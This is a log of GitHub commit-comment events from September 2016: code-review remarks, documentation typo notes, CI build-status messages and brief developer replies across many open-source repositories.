{"id":"4502419072","type":"CommitCommentEvent","actor":{"login":"zoeyhe"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18863391,"position":10,"line":116,"path":"product/计算与网络/私有网络/腾讯云上资源互通/对等连接.md","commit_id":"13333dcfa99b5d5b7785e59de535aebdc8e1710d","created_at":"2016-09-01T13:01:59Z","updated_at":"2016-09-01T13:01:59Z","body":"错别字 @hebinbinSEU "}},"created_at":"2016-09-01T13:01:59Z"}
{"id":"4502419183","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863392,"position":18,"line":18,"path":"User.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:02:00Z","updated_at":"2016-09-01T13:02:00Z","body":"You have List<PhoneAddress> phoneAddressList. Why you need one more PhoneAddress phoneAddress?"}},"created_at":"2016-09-01T13:02:00Z"}
{"id":"4502419497","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863394,"position":null,"line":null,"path":null,"commit_id":"88fcaf1273147a98caae4f9c2fde8ece9df8ba25","created_at":"2016-09-01T13:02:04Z","updated_at":"2016-09-01T13:02:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 876](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12174&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:02:04Z"}
{"id":"4502419528","type":"CommitCommentEvent","actor":{"login":"gondo"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18863395,"position":null,"line":null,"path":null,"commit_id":"b044f44de9c3a059726338dfa7441a7cde84c77d","created_at":"2016-09-01T13:02:04Z","updated_at":"2016-09-01T13:02:04Z","body":"OMG! another code breaking merge without ANY note or bumping the version.\r\nsome people do use templates overwrite and this completely break the code"}},"created_at":"2016-09-01T13:02:04Z"}
{"id":"4502420044","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863396,"position":null,"line":null,"path":null,"commit_id":"88fcaf1273147a98caae4f9c2fde8ece9df8ba25","created_at":"2016-09-01T13:02:11Z","updated_at":"2016-09-01T13:02:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 876](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12174&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:07"}},"created_at":"2016-09-01T13:02:11Z"}
{"id":"4502423585","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863403,"position":32,"line":32,"path":"logical/src/main/java/org/apache/drill/common/expression/fn/JodaDateValidator.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:02:48Z","updated_at":"2016-09-01T13:02:48Z","body":"final?"}},"created_at":"2016-09-01T13:02:48Z"}
{"id":"4502423604","type":"CommitCommentEvent","actor":{"login":"zoeyhe"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18863405,"position":72,"line":166,"path":"product/计算与网络/私有网络/腾讯云上资源互通/对等连接.md","commit_id":"13333dcfa99b5d5b7785e59de535aebdc8e1710d","created_at":"2016-09-01T13:02:48Z","updated_at":"2016-09-01T13:02:48Z","body":"放在注释里好些？？？"}},"created_at":"2016-09-01T13:02:48Z"}
{"id":"4502423606","type":"CommitCommentEvent","actor":{"login":"sublimemahesh"},"repo":{"name":"sublimelk/git-int"},"payload":{"comment":{"id":18863407,"position":13,"line":13,"path":"gallery.php","commit_id":"9a172aacff5f0dc3884f89afbe8f27d5c5072a8d","created_at":"2016-09-01T13:02:48Z","updated_at":"2016-09-01T13:02:48Z","body":"Please add the title"}},"created_at":"2016-09-01T13:02:48Z"}
{"id":"4502424669","type":"CommitCommentEvent","actor":{"login":"sublimemahesh"},"repo":{"name":"sublimelk/git-int"},"payload":{"comment":{"id":18863412,"position":5,"line":5,"path":"about-us.php","commit_id":"158e39e6cdfee72e673123e9c56521912ae33bc5","created_at":"2016-09-01T13:02:59Z","updated_at":"2016-09-01T13:02:59Z","body":"Please add the title"}},"created_at":"2016-09-01T13:02:59Z"}
{"id":"4502424918","type":"CommitCommentEvent","actor":{"login":"rykelly"},"repo":{"name":"PecanProject/pecan"},"payload":{"comment":{"id":18863414,"position":null,"line":null,"path":null,"commit_id":"db19bcadbd7fb7e67ce80a5a428acde5d7b0868e","created_at":"2016-09-01T13:03:02Z","updated_at":"2016-09-01T13:03:02Z","body":"> Now, the last option did become redundant when I created the option to not include a MA block at all, so in theory that could be dropped and the read.settings updated to drop the MA block if update=False\r\n\r\nThanks for clarifying. I agree with this last statement. \"forceupdate\" sounds like you're making the decision between `TRUE` and `AUTO` as you defined them above. Of course we need an option for no MA at all, but saying \"don't force update\" (i.e. `forceupdate=FALSE`) doesn't mean (in English) \"don't do the update under any circumstances.\" As you mention though, you've already made the change so that skipping MA can be achieved by omitting the MA block from `settings`, which is intuitive and consistent with other modules. \r\n\r\nI think the most intuitive thing is for `forceupdate` to be a simple boolean option where `TRUE` means force the MA to run (no change in meaning) and `FALSE` (or omitted, which should probably be the default) means only run if needed (i.e. equivalent to current meaning of `AUTO`). However, this has backwards compatibility issues. How about changing the name of the option in settings (e.g. `require`) and making *that* a simple TRUE/FALSE. `read.settings` can then map deprecated `forceupdate` settings to the new version:\r\n\r\n`forceupdate` (deprecated) | new setting\r\n------------ | -------------\r\nTRUE | `require=TRUE`\r\nAUTO (or missing) | `require=FALSE`\r\nFALSE | *delete MA block entirely*\r\n"}},"created_at":"2016-09-01T13:03:02Z"}
{"id":"4502426679","type":"CommitCommentEvent","actor":{"login":"nul800sebastiaan"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863421,"position":132,"line":112,"path":"OurUmbraco/Our/Controllers/RegisterController.cs","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T13:03:22Z","updated_at":"2016-09-01T13:03:22Z","body":"Just so you know these are ONE time \"migrations\" so we know they will work when we deploy now. We don't need to care about the future, this happens exactly once and never again. These migrations are here so we can automatically deploy Our without having to manually edit stuff in the backoffice after deploy (and having Our be broken until the manual updates have been done)."}},"created_at":"2016-09-01T13:03:22Z"}
{"id":"4502428209","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":18863426,"position":null,"line":null,"path":null,"commit_id":"04547da9dae6fdba66adcb795e351cbb3f4f6c34","created_at":"2016-09-01T13:03:40Z","updated_at":"2016-09-01T13:03:40Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.78](http://build.prxm.it:8813/viewLog.html?buildId=3647&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 76; runner failure (new) Build time: 00:02:28\n### Failed tests\n```\nxUnit.net v1 Tests for C:\\agents\\nes\\work\\623237454e7de2b5\\src\\NEventStore.Persistence.MongoDB.Tests\\bin\\Release\\NEventStore.Persistence.MongoDB.Tests.dll (1): when adding a commit after a snapshot, it should find the stream in the set of streams to be sn: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T13:03:40Z"}
{"id":"4502428210","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":18863425,"position":null,"line":null,"path":null,"commit_id":"04547da9dae6fdba66adcb795e351cbb3f4f6c34","created_at":"2016-09-01T13:03:40Z","updated_at":"2016-09-01T13:03:40Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.78](http://build.prxm.it:8813/viewLog.html?buildId=3647&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 76; runner failure (new) Build time: 00:02:28\n### Failed tests\n```\nxUnit.net v1 Tests for C:\\agents\\nes\\work\\623237454e7de2b5\\src\\NEventStore.Persistence.MongoDB.Tests\\bin\\Release\\NEventStore.Persistence.MongoDB.Tests.dll (1): when adding a commit after a snapshot, it should find the stream in the set of streams to be sn: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T13:03:40Z"}
{"id":"4502430869","type":"CommitCommentEvent","actor":{"login":"Tazaf"},"repo":{"name":"MediaComem/biosentiers"},"payload":{"comment":{"id":18863437,"position":5,"line":6,"path":"www/wikitude-worlds/main/mini-map-orientation/mini-map-orientation.module.js","commit_id":"3865e6c01df8a1a98f8d9ec896f446ed26ee98de","created_at":"2016-09-01T13:04:08Z","updated_at":"2016-09-01T13:04:08Z","body":"Ah, j’avais hésité aussi à mettre des dépendances propres aux modules plutôt que de tout mettre en dépendance du module principal. Je l’ai pas fait, parce que je me suis dit que ça allait mettre le dawa au niveau de l’injection automatique"}},"created_at":"2016-09-01T13:04:08Z"}
{"id":"4502431889","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863446,"position":14,"line":336,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/ExecConstants.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:04:18Z","updated_at":"2016-09-01T13:04:18Z","body":"Any particular reason we are not adding to the end of the file?"}},"created_at":"2016-09-01T13:04:18Z"}
{"id":"4502432454","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863448,"position":null,"line":null,"path":null,"commit_id":"772a53059cd9669ae13cf541850b12c9350efabf","created_at":"2016-09-01T13:04:24Z","updated_at":"2016-09-01T13:04:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 877](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12176&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:04:24Z"}
{"id":"4502434313","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863450,"position":45,"line":45,"path":"src/org/kms/crypto/CryptoMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:04:46Z","updated_at":"2016-09-01T13:04:46Z","body":"what is the logic behind this randomBitSize. Please put in comments"}},"created_at":"2016-09-01T13:04:46Z"}
{"id":"4502435048","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863451,"position":42,"line":418,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/planner/logical/DrillOptiq.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:04:55Z","updated_at":"2016-09-01T13:04:55Z","body":"Is check of null is required?"}},"created_at":"2016-09-01T13:04:55Z"}
{"id":"4502436033","type":"CommitCommentEvent","actor":{"login":"zoeyhe"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18863454,"position":5,"line":187,"path":"product/计算与网络/私有网络/私有网络和子网.md","commit_id":"2e2a9b28d510c0b332d2bca5d8eedb1c69694b1e","created_at":"2016-09-01T13:05:07Z","updated_at":"2016-09-01T13:05:07Z","body":"少一个 ） 号"}},"created_at":"2016-09-01T13:05:07Z"}
{"id":"4502436273","type":"CommitCommentEvent","actor":{"login":"anyw"},"repo":{"name":"anyw/instructor"},"payload":{"comment":{"id":18863456,"position":null,"line":null,"path":null,"commit_id":"ac3cc427a2fea42a4a9a0283ee33a38fe20b6a5f","created_at":"2016-09-01T13:05:12Z","updated_at":"2016-09-01T13:05:12Z","body":"ok"}},"created_at":"2016-09-01T13:05:12Z"}
{"id":"4502438751","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863460,"position":4,"line":149,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/server/options/SystemOptionManager.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:05:36Z","updated_at":"2016-09-01T13:05:36Z","body":"Probably add as last?"}},"created_at":"2016-09-01T13:05:36Z"}
{"id":"4502438935","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863462,"position":39,"line":39,"path":"src/org/kms/crypto/CryptoMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:05:38Z","updated_at":"2016-09-01T13:05:38Z","body":"ideally  KMS_GLOBAL_KEY should be private to this class and should not be accessed from anywhere else, so no need of this getter"}},"created_at":"2016-09-01T13:05:38Z"}
{"id":"4502441770","type":"CommitCommentEvent","actor":{"login":"zoeyhe"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":18863466,"position":46,"line":231,"path":"product/计算与网络/私有网络/私有网络和子网.md","commit_id":"2e2a9b28d510c0b332d2bca5d8eedb1c69694b1e","created_at":"2016-09-01T13:06:11Z","updated_at":"2016-09-01T13:06:11Z","body":"5）和其他标题格式不一样 注意全半角"}},"created_at":"2016-09-01T13:06:11Z"}
{"id":"4502442601","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863467,"position":34,"line":34,"path":"src/org/kms/crypto/CryptoMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:06:20Z","updated_at":"2016-09-01T13:06:20Z","body":"what is the use of this map when we have a hard coded value for CURRENT_INSTANCE ?\r\nWould not making CryptoMain a singleton class suffice ?"}},"created_at":"2016-09-01T13:06:20Z"}
{"id":"4502444710","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863473,"position":71,"line":71,"path":"src/org/kms/crypto/CryptoMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:06:45Z","updated_at":"2016-09-01T13:06:45Z","body":"please indent and put comments"}},"created_at":"2016-09-01T13:06:45Z"}
{"id":"4502445943","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863476,"position":1,"line":1,"path":"exec/java-exec/src/test/resources/test_joda_ansi_date.json","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:06:59Z","updated_at":"2016-09-01T13:06:59Z","body":"May be create separate folder for these three files?"}},"created_at":"2016-09-01T13:06:59Z"}
{"id":"4502447739","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863484,"position":61,"line":61,"path":"src/org/kms/crypto/CryptoMain.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:07:20Z","updated_at":"2016-09-01T13:07:20Z","body":"should think of a way of logging (syslog, log4j etc). we would be needing logs to debug issues"}},"created_at":"2016-09-01T13:07:20Z"}
{"id":"4502450452","type":"CommitCommentEvent","actor":{"login":"evgeniyd"},"repo":{"name":"dkhamsing/open-source-ios-apps"},"payload":{"comment":{"id":18863496,"position":null,"line":null,"path":null,"commit_id":"1b3ac582fbb206e1423f340ccef99def45bc6e9f","created_at":"2016-09-01T13:07:52Z","updated_at":"2016-09-01T13:07:52Z","body":"@akaralar appreciate your effort! "}},"created_at":"2016-09-01T13:07:52Z"}
{"id":"4502451892","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863501,"position":null,"line":null,"path":null,"commit_id":"772a53059cd9669ae13cf541850b12c9350efabf","created_at":"2016-09-01T13:08:11Z","updated_at":"2016-09-01T13:08:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 877](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12176&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:03:47"}},"created_at":"2016-09-01T13:08:11Z"}
{"id":"4502454906","type":"CommitCommentEvent","actor":{"login":"PRJosh"},"repo":{"name":"TBoneWiz/kernel_samsung_mondrianwifi"},"payload":{"comment":{"id":18863508,"position":null,"line":null,"path":null,"commit_id":"c76a9b248f052885c1c3fe4c6a2f2b85bf360f2b","created_at":"2016-09-01T13:08:44Z","updated_at":"2016-09-01T13:08:44Z","body":"Where did you update from? What commits etc? "}},"created_at":"2016-09-01T13:08:44Z"}
{"id":"4502456460","type":"CommitCommentEvent","actor":{"login":"flo"},"repo":{"name":"Terasology/StructureTemplates"},"payload":{"comment":{"id":18863512,"position":82,"line":156,"path":"src/main/java/org/terasology/structureTemplates/internal/systems/StructureSpawnServerSystem.java","commit_id":"7cf90d7ba99b335b85d41eb91ec42da04384263a","created_at":"2016-09-01T13:09:03Z","updated_at":"2016-09-01T13:09:03Z","body":"I think freezing the build process would be the best option. You can't prevent chunks from getting unloaded / force chunks to become loaded. (e.g. it could also be that the world iscurrently loading, and only half of the half build structure got loaded so far)"}},"created_at":"2016-09-01T13:09:03Z"}
{"id":"4502457231","type":"CommitCommentEvent","actor":{"login":"dgriesert"},"repo":{"name":"bompf/amos-ss16-proj1"},"payload":{"comment":{"id":18863516,"position":5,"line":106,"path":"src/main/java/de/fuberlin/chaostesting/model/Test.java","commit_id":"c81eaafda4d7cc188aa55dc7d6df7794de20a1f6","created_at":"2016-09-01T13:09:12Z","updated_at":"2016-09-01T13:09:12Z","body":"This breaks the building procress."}},"created_at":"2016-09-01T13:09:12Z"}
{"id":"4502458018","type":"CommitCommentEvent","actor":{"login":"nxmatic"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18863520,"position":179,"line":422,"path":"nuxeo-runtime/nuxeo-launcher-commons/src/test/java/org/nuxeo/launcher/config/ConfigurationGeneratorTest.java","commit_id":"ffe36f0a88c16e16f86d9e634c6c745d040b3d55","created_at":"2016-09-01T13:09:20Z","updated_at":"2016-09-01T13:09:20Z","body":"We don't support java9 at this time, so I didn't taken in account the new version specification. I agree we should open up a ticket for that."}},"created_at":"2016-09-01T13:09:20Z"}
{"id":"4502458034","type":"CommitCommentEvent","actor":{"login":"fxprunayre"},"repo":{"name":"geonetwork/core-geonetwork"},"payload":{"comment":{"id":18863521,"position":5,"line":50,"path":"web/src/main/webapp/xslt/common/error.xsl","commit_id":"682e02ce05602fc4a14fc07d6c0f6899156e0b74","created_at":"2016-09-01T13:09:20Z","updated_at":"2016-09-01T13:09:20Z","body":"Here we assume that the message will not contains meaningful \"<\" sign (even if I can't think of any now). Maybe better to remove only suspect tags if this is the goal ? something like ```replace(., '<script.*>', '')>``` maybe"}},"created_at":"2016-09-01T13:09:20Z"}
{"id":"4502459586","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863523,"position":41,"line":41,"path":"UserController.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:09:37Z","updated_at":"2016-09-01T13:09:37Z","body":"Command Stringer@ arji pahel vorpes constantner. Voch te hard code anel Swithch-i mej"}},"created_at":"2016-09-01T13:09:37Z"}
{"id":"4502459969","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863525,"position":126,"line":126,"path":"logical/src/main/java/org/apache/drill/common/expression/fn/JodaDateValidator.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:09:40Z","updated_at":"2016-09-01T13:09:40Z","body":"can't be"}},"created_at":"2016-09-01T13:09:40Z"}
{"id":"4502460865","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863527,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:09:50Z","updated_at":"2016-09-01T13:09:50Z","body":">satserver:~$ sudo vainfo\r\nerror: XDG_RUNTIME_DIR not set in the environment.\r\nerror: can't connect to X server!\r\nlibva info: VA-API version 0.39.2\r\nlibva info: va_getDriverName() returns 0\r\nlibva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so\r\nlibva info: Found init function __vaDriverInit_0_39\r\nlibva info: va_openDriver() returns 0\r\nvainfo: VA-API version: 0.39 (libva 1.7.1)\r\nvainfo: Driver version: Intel i965 driver for Intel(R) Bay Trail - 1.7.1\r\nvainfo: Supported profile and entrypoints\r\n      VAProfileMPEG2Simple            : VAEntrypointVLD\r\n      VAProfileMPEG2Simple            : VAEntrypointEncSlice\r\n      VAProfileMPEG2Main              : VAEntrypointVLD\r\n      VAProfileMPEG2Main              : VAEntrypointEncSlice\r\n      VAProfileH264ConstrainedBaseline: VAEntrypointVLD\r\n      VAProfileH264ConstrainedBaseline: VAEntrypointEncSlice\r\n      VAProfileH264Main               : VAEntrypointVLD\r\n      VAProfileH264Main               : VAEntrypointEncSlice\r\n      VAProfileH264High               : VAEntrypointVLD\r\n      VAProfileH264High               : VAEntrypointEncSlice\r\n      VAProfileH264StereoHigh         : VAEntrypointVLD\r\n      VAProfileVC1Simple              : VAEntrypointVLD\r\n      VAProfileVC1Main                : VAEntrypointVLD\r\n      VAProfileVC1Advanced            : VAEntrypointVLD\r\n      VAProfileNone                   : VAEntrypointVideoProc\r\n      VAProfileJPEGBaseline           : VAEntrypointVLD\r\n\r\nI upgraded to libva 0.7.1 maybe its add that (no idea).\r\nI`m also confused - h265 uses less gpu % then h264 ... O_o"}},"created_at":"2016-09-01T13:09:50Z"}
{"id":"4502461250","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18863529,"position":83,"line":405,"path":"TX.h","commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T13:09:55Z","updated_at":"2016-09-01T13:09:55Z","body":"I think we need this in order for the radio to work."}},"created_at":"2016-09-01T13:09:55Z"}
{"id":"4502461812","type":"CommitCommentEvent","actor":{"login":"PRJosh"},"repo":{"name":"TBoneWiz/kernel_samsung_mondrianwifi"},"payload":{"comment":{"id":18863530,"position":null,"line":null,"path":null,"commit_id":"410b0bd1fd0b0ae22105eec578bf44f686371e50","created_at":"2016-09-01T13:10:02Z","updated_at":"2016-09-01T13:10:02Z","body":"I honestly don't like this, but for the life of me I can't understand why it's failing if (rndis->ethaddr[0]) ... Something in the samsung usb driver support is making that statement not work.... :L"}},"created_at":"2016-09-01T13:10:02Z"}
{"id":"4502464253","type":"CommitCommentEvent","actor":{"login":"mstevetodd"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18863535,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-01T13:10:29Z","updated_at":"2016-09-01T13:10:29Z","body":"This @CheckForNull change is showing as an error in Eclipse (Mars) for me. Specifically:\r\n`Annotation types that do not specify explicit target element types cannot be applied here`\r\nAny suggestions?\r\n\r\n"}},"created_at":"2016-09-01T13:10:29Z"}
{"id":"4502465183","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":18863538,"position":null,"line":null,"path":null,"commit_id":"6925cc45229ddeda5778d644748df3e5880f7768","created_at":"2016-09-01T13:10:40Z","updated_at":"2016-09-01T13:10:40Z","body":"ok"}},"created_at":"2016-09-01T13:10:40Z"}
{"id":"4502465689","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18863540,"position":12,"line":74,"path":"nuxeo-runtime/nuxeo-launcher-commons/src/main/java/org/nuxeo/launcher/config/JVMVersion.java","commit_id":"6a6dcbc741a4e31ba0d6d6940e4fe7b8b5894515","created_at":"2016-09-01T13:10:45Z","updated_at":"2016-09-01T13:10:45Z","body":"Oracle calls it \"JDK 9\", not \"JVM 9\"."}},"created_at":"2016-09-01T13:10:45Z"}
{"id":"4502471779","type":"CommitCommentEvent","actor":{"login":"danieleds"},"repo":{"name":"danieleds/exceljs"},"payload":{"comment":{"id":18863556,"position":14,"line":256,"path":"lib/stream/xlsx/workbook-writer.js","commit_id":"d5011ba46c5192942d1aa7aa6790a2a0459b54e3","created_at":"2016-09-01T13:11:52Z","updated_at":"2016-09-01T13:11:52Z","body":"I'd like to urge to merge this asap... The current version is breaking builds, so we have to keep using version 0.2.8 which has a security vulnerability only fixed in v0.2.13 as per #164"}},"created_at":"2016-09-01T13:11:52Z"}
{"id":"4502472340","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":18863557,"position":44,"line":44,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/fn/impl/testing/TestDateConversions.java","commit_id":"072d8b0ff5de6104c174635ea6de7e73b74b0f2f","created_at":"2016-09-01T13:11:58Z","updated_at":"2016-09-01T13:11:58Z","body":"Please remove semicolon in all finally blocks - alter SESSION reset `%s`;"}},"created_at":"2016-09-01T13:11:58Z"}
{"id":"4502474160","type":"CommitCommentEvent","actor":{"login":"chait12"},"repo":{"name":"chait12/Prod86"},"payload":{"comment":{"id":18863565,"position":null,"line":null,"path":null,"commit_id":"3279dcd557e0d5c8039a9603d375a25a4376c55d","created_at":"2016-09-01T13:12:19Z","updated_at":"2016-09-01T13:12:19Z","body":"jfjs"}},"created_at":"2016-09-01T13:12:19Z"}
{"id":"4502474765","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863567,"position":null,"line":null,"path":null,"commit_id":"c26efbdf12da142ef8f15afcfb7d2b384169e14c","created_at":"2016-09-01T13:12:25Z","updated_at":"2016-09-01T13:12:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 878](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12180&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:12:25Z"}
{"id":"4502475739","type":"CommitCommentEvent","actor":{"login":"hillga"},"repo":{"name":"hillga/dojo_rules"},"payload":{"comment":{"id":18863568,"position":null,"line":null,"path":null,"commit_id":"d12d0fc41ac38f112e3b5b73ced2a8a2c538c775","created_at":"2016-09-01T13:12:36Z","updated_at":"2016-09-01T13:12:36Z","body":"wink wink"}},"created_at":"2016-09-01T13:12:36Z"}
{"id":"4502476153","type":"CommitCommentEvent","actor":{"login":"akaralar"},"repo":{"name":"dkhamsing/open-source-ios-apps"},"payload":{"comment":{"id":18863569,"position":null,"line":null,"path":null,"commit_id":"1b3ac582fbb206e1423f340ccef99def45bc6e9f","created_at":"2016-09-01T13:12:40Z","updated_at":"2016-09-01T13:12:40Z","body":"@evgeniyd no worries, thanks for open sourcing"}},"created_at":"2016-09-01T13:12:40Z"}
{"id":"4502476487","type":"CommitCommentEvent","actor":{"login":"anehrkor"},"repo":{"name":"cms-analysis/HiggsAnalysis-KITHiggsToTauTau"},"payload":{"comment":{"id":18863570,"position":null,"line":null,"path":null,"commit_id":"545558ac7997ab3566f5b23063c0b459d4e98981","created_at":"2016-09-01T13:12:44Z","updated_at":"2016-09-01T13:12:44Z","body":"If you have Run2016/Spring2016 Artus ntuples with stitching weights, you need to replace `numberGeneratedEventsWeight*crossSectionPerEventWeight` by `numberGeneratedEventsWeight*crossSectionPerEventWeight*sampleStitchingWeight` [here](https://github.com/cms-analysis/HiggsAnalysis-KITHiggsToTauTau/blob/545558ac7997ab3566f5b23063c0b459d4e98981/python/plotting/configs/samples_run2_2016.py#L105), [here](https://github.com/cms-analysis/HiggsAnalysis-KITHiggsToTauTau/blob/545558ac7997ab3566f5b23063c0b459d4e98981/python/plotting/configs/samples_run2_2016.py#L113) and [here](https://github.com/cms-analysis/HiggsAnalysis-KITHiggsToTauTau/blob/545558ac7997ab3566f5b23063c0b459d4e98981/python/plotting/configs/samples_run2_2016.py#L118)."}},"created_at":"2016-09-01T13:12:44Z"}
{"id":"4502476804","type":"CommitCommentEvent","actor":{"login":"kurtov"},"repo":{"name":"Unact/sencha-common"},"payload":{"comment":{"id":18863571,"position":23,"line":229,"path":"common/src/lib/singletable/ViewController.js","commit_id":"59659f9355719f6b5b1a49c11c49ceac173eccc4","created_at":"2016-09-01T13:12:48Z","updated_at":"2016-09-01T13:12:48Z","body":"наверное, все же когда autoRefreshingTable равна истине, то надо рефрешить содержимое."}},"created_at":"2016-09-01T13:12:48Z"}
